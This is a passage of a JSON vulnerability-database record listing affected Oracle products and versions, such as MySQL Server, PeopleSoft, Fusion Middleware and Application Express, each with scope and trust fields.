"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.16.0"
},
{
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.55"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.54"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.53"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.2"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.0"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.29"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.28"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.27"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.26"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.23"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.22"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.21"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.48"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.47"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.46"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.45"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.42"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.41"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.40"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.25"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.24"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.20"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.16"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.15"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.44"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.43"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.36"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.35"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7.12"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.30"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.49"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8.1"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.7"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.6"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.5"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "jrockit r28.3.10",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2.0.5"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "in-memory policy analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"model": "http server 12c",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "http server 11g",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0.1"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.0"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.12"
},
{
"model": "healthcare analytics data integration",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.0.0.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.2.3"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.2.8.3"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2.0"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.1.0"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1.1"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.23.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.10"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.8"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.7"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.6"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.5"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.4"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.3"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.3"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.3.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.4"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1.0.0"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"model": "enterprise communications broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.3"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.2"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.5"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.4"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"model": "documaker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.12"
},
{
"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.11"
},
{
"model": "database 11g release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "211.2.0.4"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.0"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.0"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.9"
},
{
"model": "communications operations monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.2.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.1.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.4.1.5.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.530.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.529.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5.33.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "communications eagle application processor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.0"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.1.0.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.5.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.1"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.3.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.6"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.1.00.10"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.3.00.08"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.0.00.27"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.4"
},
{
"model": "agile engineering data management",
